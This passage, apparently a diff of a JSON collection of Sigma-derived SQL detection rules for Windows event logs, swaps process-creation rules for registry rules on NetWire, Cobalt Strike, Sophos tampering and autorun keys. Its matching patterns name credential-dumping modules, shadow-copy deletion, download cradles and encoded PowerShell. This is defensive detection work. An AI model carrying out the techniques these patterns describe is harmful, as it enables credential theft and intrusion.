LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "Suspicious Rundll32 Setupapi.dll Activity", - "id": "285b85b1-a555-4095-8652-a8a4106af63f", - "status": "test", - "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", - "author": "Konstantin Grishchenko, oscd.community", + "title": "Potential Persistence Via Disk Cleanup Handler - Registry", + "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "status": "experimental", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. 
It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.persistence" ], "falsepositives": [ - "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" + "Legitimate new entry added by windows" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject 
LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" + "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", + "id": "480421f9-417f-4d3b-9552-fd2728443ec8", "status": "experimental", - "description": "Detects PowerShell command line contents that 
include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE 
'\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine 
LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE 
'%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE 
'%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((NewValue LIKE '(Empty)' ESCAPE '\\' OR NewValue LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" }, { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", + "title": "CobaltStrike Service 
Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ], "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine 
LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' 
ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", + "status": "experimental", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos 
Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Disable Administrative Share Creation at Startup", + "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1070.005" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' 